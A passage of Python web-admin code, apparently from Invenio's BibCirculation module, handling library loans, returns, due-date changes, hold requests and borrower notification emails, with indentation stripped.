tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_DONE,
request_id)
db.update_request_barcode(barcode, request_id)
update_requests_statuses(barcode)
result = db.get_all_loans(20)
infos.append(_('A new loan has been registered with success.'))
title = _("Current loans")
body = bc_templates.tmpl_all_loans(result=result,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_loan(req, request_id, recid, borrower_id, ln=CFG_SITE_LANG):
"""
Create a new loan from a hold request.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
borrower = db.get_borrower_details(borrower_id)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
return page(title=_("Create Loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def make_new_loan_from_request(req, check_id, barcode, ln=CFG_SITE_LANG):
"""
Turns a request into a loan.
@type check_id: integer.
@param check_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
recid = db.get_request_recid(check_id)
borrower_id = db.get_request_borrower_id(check_id)
borrower_info = db.get_borrower_details(borrower_id)
due_date = renew_loan_for_X_days(barcode)
if db.is_item_on_loan(barcode):
infos.append('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on loan.' % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
return redirect_to_url(req,
'%s/admin2/bibcirculation/all_loans?ln=%s&msg=ok' % (CFG_SITE_SECURE_URL, ln))
else:
db.new_loan(borrower_id, recid, barcode, due_date,
CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN, 'normal', '')
infos.append(_('A new loan has been registered with success.'))
#try:
# register_customevent("baskets", ["display", "", user_str])
#except:
# register_exception(suffix="Do the webstat tables exists? Try with 'webstatadmin --load-config'")
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_register_new_loan(borrower_info=borrower_info,
infos=infos,
recid=recid,
ln=ln)
return page(title=_("New Loan"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_return(req, ln=CFG_SITE_LANG):
"""
Page where is possible to register the return of an item.
"""
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_loan_return(infos=infos, ln=ln)
return page(title=_("Loan return"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_return_confirm(req, barcode, ln=CFG_SITE_LANG):
"""
Performs the return of a loan and displays a confirmation page.
In case the book is requested, it is possible to select a request
and make a loan from it (make_new_loan_from_request)
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
loan_id = db.is_item_on_loan(barcode)
if recid is None:
infos.append(_('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_loan_return(infos=infos, ln=ln)
elif loan_id is None:
message = _("The item the with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is not on loan. Please, try again.") % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
body = bc_templates.tmpl_loan_return(infos=infos, ln=ln)
else:
library_id = db.get_item_info(barcode)[1]
if CFG_CERN_SITE:
library_type = db.get_library_type(library_id)
if library_type != CFG_BIBCIRCULATION_LIBRARY_TYPE_MAIN:
library_name = db.get_library_name(library_id)
message = _("%(x_strong_tag_open)sWARNING:%(x_strong_tag_close)s Note that item %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s location is %(x_strong_tag_open)s%(x_location)s%(x_strong_tag_close)s") % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>', 'x_location': library_name}
infos.append(message)
borrower_id = db.get_borrower_id(barcode)
borrower_name = db.get_borrower_name(borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF, barcode)
db.return_loan(barcode)
update_requests_statuses(barcode)
description = db.get_item_description(barcode)
result = db.get_pending_loan_request(recid, description)
body = bc_templates.tmpl_loan_return_confirm(
infos=infos,
borrower_name=borrower_name,
borrower_id=borrower_id,
recid=recid,
barcode=barcode,
return_date=datetime.date.today(),
result=result,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Loan return"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def claim_book_return(req, borrower_id, recid, loan_id,
template, ln=CFG_SITE_LANG):
"""
Claim the return of an item.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
recid: identify the record. It is also the primary key of
the table bibrec.
template: letter template.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
email_body = generate_email_body(load_template(template), loan_id)
email = db.get_borrower_email(borrower_id)
subject = book_title_from_MARC(int(recid))
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_borrower_notification(email=email,
subject=subject,
email_body=email_body,
borrower_id=borrower_id,
from_address=CFG_BIBCIRCULATION_LOANS_EMAIL,
ln=ln)
return page(title=_("Claim return"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def change_due_date_step1(req, barcode, borrower_id, ln=CFG_SITE_LANG):
"""
Change the due date of a loan, step1.
loan_id: identify a loan. It is the primery key of the table
crcLOAN.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
loan_id = db.get_current_loan_id(barcode)
loan_details = db.get_loan_infos(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_change_due_date_step1(loan_details=loan_details,
loan_id=loan_id,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Change due date"),
uid=id_user,
req=req,
body=body, language=ln,
#metaheaderadd = '<link rel="stylesheet" '\
# 'href="%s/img/jquery-ui/themes/redmond/ui.theme.css" '\
# 'type="text/css" />' % CFG_SITE_SECURE_URL,
metaheaderadd = '<link rel="stylesheet" href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" '\
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def change_due_date_step2(req, new_due_date, loan_id, borrower_id,
ln=CFG_SITE_LANG):
"""
Change the due date of a loan, step2.
due_date: new due date.
loan_id: identify a loan. It is the primery key of the table
crcLOAN.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.update_due_date(loan_id, new_due_date)
update_status_if_expired(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_change_due_date_step2(new_due_date=new_due_date,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Change due date"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_request_step1(req, barcode, recid, key, string, ln=CFG_SITE_LANG):
"""
Place a new request from the item's page, step1.
barcode: identify the item. It is the primary key of the table
crcITEM.
recid: identify the record. It is also the primary key of
the table bibrec.
key: search field.
string: search pattern.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
infos = []
if key and not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_place_new_request_step1(result=None,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
if len(result) == 1:
return place_new_request_step2(req, barcode, recid,
borrowers_list[0], ln)
else:
body = bc_templates.tmpl_place_new_request_step1(result=borrowers_list,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_request_step2(req, barcode, recid, user_info, ln=CFG_SITE_LANG):
"""
Place a new request from the item's page, step2.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type user_info: list.
@param user_info: information of the user/borrower who was selected.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
body = bc_templates.tmpl_place_new_request_step2(barcode=barcode,
recid=recid,
user_info=user_info,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_request_step3(req, barcode, recid, user_info,
period_from, period_to, ln=CFG_SITE_LANG):
"""
Place a new request from the item's page, step3.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@return: new request.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
(_id, ccid, name, email, phone, address, mailbox) = user_info
# validate the period of interest given by the admin
if validate_date_format(period_from) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sFrom: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_from, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_place_new_request_step2(barcode=barcode,
recid=recid,
user_info=user_info,
infos=infos,
ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
elif validate_date_format(period_to) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sTo: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_to, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_place_new_request_step2(barcode=barcode,
recid=recid,
user_info=user_info,
infos=infos,
ln=ln)
# Register request
borrower_id = db.get_borrower_id_by_email(email)
if borrower_id == None:
db.new_borrower(ccid, name, email, phone, address, mailbox, '')
borrower_id = db.get_borrower_id_by_email(email)
req_id = db.new_hold_request(borrower_id, recid, barcode,
period_from, period_to,
CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING)
pending_request = update_requests_statuses(barcode)
if req_id == pending_request:
(title, year, author,
isbn, publisher) = book_information_from_MARC(int(recid))
details = db.get_loan_request_details(req_id)
if details:
library = details[3]
location = details[4]
request_date = details[7]
else:
location = ''
library = ''
request_date = ''
link_to_holdings_details = CFG_SITE_URL + \
'/record/%s/holdings' % str(recid)
subject = _('New request')
message = load_template('notification')
message = message % (name, ccid, email, address, mailbox, title,
author, publisher, year, isbn, location, library,
link_to_holdings_details, request_date)
send_email(fromaddr = CFG_BIBCIRCULATION_LIBRARIAN_EMAIL,
toaddr = CFG_BIBCIRCULATION_LOANS_EMAIL,
subject = subject,
content = message,
header = '',
footer = '',
attempt_times=1,
attempt_sleeptime=10
)
send_email(fromaddr = CFG_BIBCIRCULATION_LIBRARIAN_EMAIL,
toaddr = email,
subject = subject,
content = message,
header = '',
footer = '',
attempt_times=1,
attempt_sleeptime=10
)
body = bc_templates.tmpl_place_new_request_step3(ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_loan_step1(req, barcode, recid, key, string, ln=CFG_SITE_LANG):
"""
Place a new loan from the item's page, step1.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type key: string.
@param key: search field.
@type string: string.
@param string: search pattern.
@return: list of users/borrowers.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
infos = []
if key and not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_place_new_loan_step1(result=None,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
body = bc_templates.tmpl_place_new_loan_step1(result=borrowers_list,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_loan_step2(req, barcode, recid, user_info, ln=CFG_SITE_LANG):
"""
Place a new loan from the item's page, step2.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type user_info: list.
@param user_info: information of the user/borrower who was selected.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_place_new_loan_step2(barcode=barcode,
recid=recid,
user_info=user_info,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_loan_step3(req, barcode, recid, ccid, name, email, phone,
address, mailbox, due_date, notes, ln=CFG_SITE_LANG):
"""
Place a new loan from the item's page, step3.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type name: string.
@type email: string.
@type phone: string.
@type address: string.
@type mailbos: string.
@type due_date: string.
@type notes: string.
@return: new loan.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if notes:
notes_format = '[' + time.ctime() + '] ' + notes + '\n'
else:
notes_format = ''
#loaned_on = datetime.date.today()
borrower_id = db.get_borrower_id_by_email(email)
borrower_info = db.get_borrower_data(borrower_id)
if db.is_on_loan(barcode):
infos.append(_("Item with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is already on loan.") % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
title = _("Item details")
body = bc_templates.tmpl_get_item_details(
recid=recid, copies=copies,
requests=requests, loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos, ln=ln)
elif borrower_id != 0:
db.new_loan(borrower_id, recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', notes_format)
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
title = _("New loan")
body = bc_templates.tmpl_register_new_loan(borrower_info=borrower_info,
infos=infos,
recid=recid, ln=ln)
else:
db.new_borrower(ccid, name, email, phone, address, mailbox, '')
borrower_id = db.get_borrower_id_by_email(email)
db.new_loan(borrower_id, recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', notes_format)
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
title = _("New loan")
body = bc_templates.tmpl_register_new_loan(borrower_info=borrower_info,
infos=infos,
recid=recid,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step1(req, borrower_id, p="", f="", search=None,
ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step1.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
p: search pattern.
f: field
search: search an item.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if borrower_id != None:
borrower = db.get_borrower_details(borrower_id)
else:
message = _('Empty borrower ID.')
return borrower_search(req, message, False, ln)
if search and p == '':
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
result = ''
elif search and f == 'barcode':
p = p.strip('\'" \t')
has_recid = db.get_id_bibrec(p)
if has_recid is None:
infos.append(_('The barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s does not exist on BibCirculation database.') % {'x_barcode': p, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
result = ''
else:
result = has_recid
elif search:
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
else:
result = ''
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if type(result) is types.IntType or type(result) is types.LongType:
recid = result
holdings_information = db.get_holdings_information(recid)
user_info = db.get_borrower_details(borrower_id)
body = bc_templates.tmpl_create_new_request_step2(user_info=user_info,
holdings_information=holdings_information,
recid=recid, ln=ln)
else:
body = bc_templates.tmpl_create_new_request_step1(borrower=borrower,
infos=infos,
result=result,
p=p,
f=f,
ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step2(req, recid, borrower_id, ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step2.
recid: identify the record. It is also the primary key of
the table bibrec.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
holdings_information = db.get_holdings_information(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
user_info = db.get_borrower_details(borrower_id)
body = bc_templates.tmpl_create_new_request_step2(user_info=user_info,
holdings_information=holdings_information,
recid=recid, ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step3(req, borrower_id, barcode, recid,
ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step3.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
barcode: identify the item. It is the primary key of the table
crcITEM.
recid: identify the record. It is also the primary key of
the table bibrec.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
item_info = db.get_item_info(barcode)
if item_info[6] == 'Reference':
body = bc_templates.tmpl_book_not_for_loan(ln=ln)
else:
body = bc_templates.tmpl_create_new_request_step3(
borrower_id=borrower_id,
barcode=barcode,
recid=recid,
ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step4(req, period_from, period_to, barcode,
borrower_id, recid, ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step4.
period_from: begining of the period of interest.
period_to: end of the period of interest.
barcode: identify the item. It is the primary key of the table
crcITEM.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
recid: identify the record. It is also the primary key of
the table bibrec.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.new_hold_request(borrower_id, recid, barcode,
period_from, period_to,
CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING)
update_requests_statuses(barcode)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_create_new_request_step4(ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_loan_step1(req, borrower_id, ln=CFG_SITE_LANG):
"""
Create a new loan from the borrower's page, step1.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
borrower = db.get_borrower_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_create_new_loan_step1(borrower=borrower,
infos=infos,
ln=ln)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_loan_step2(req, borrower_id, barcode, notes, ln=CFG_SITE_LANG):
"""
Create a new loan from the borrower's page, step2.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
barcode: identify the item. It is the primary key of the table
crcITEM.
notes: notes about the new loan.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
#borrower_info = db.get_borrower_data(borrower_id)
has_recid = db.get_id_bibrec(barcode)
loan_id = db.is_item_on_loan(barcode)
if notes:
notes_format = '[' + time.ctime() + '] ' + notes + '\n'
else:
notes_format = ''
infos = []
if has_recid is None:
infos.append(_('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.'))
borrower = db.get_borrower_details(borrower_id)
title = _("New loan")
body = bc_templates.tmpl_create_new_loan_step1(borrower=borrower,
infos=infos,
ln=ln)
elif loan_id:
infos.append(_('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on loan.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
borrower = db.get_borrower_details(borrower_id)
title = _("New loan")
body = bc_templates.tmpl_create_new_loan_step1(borrower=borrower,
infos=infos,
ln=ln)
else:
#loaned_on = datetime.date.today()
due_date = renew_loan_for_X_days(barcode)
db.new_loan(borrower_id, has_recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', notes_format)
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
result = db.get_all_loans(20)
title = _("Current loans")
infos.append(_('A new loan has been registered with success.'))
body = bc_templates.tmpl_all_loans(result=result, infos=infos, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=title,
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def all_requests(req, request_id, ln=CFG_SITE_LANG):
"""
Display all requests.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_id:
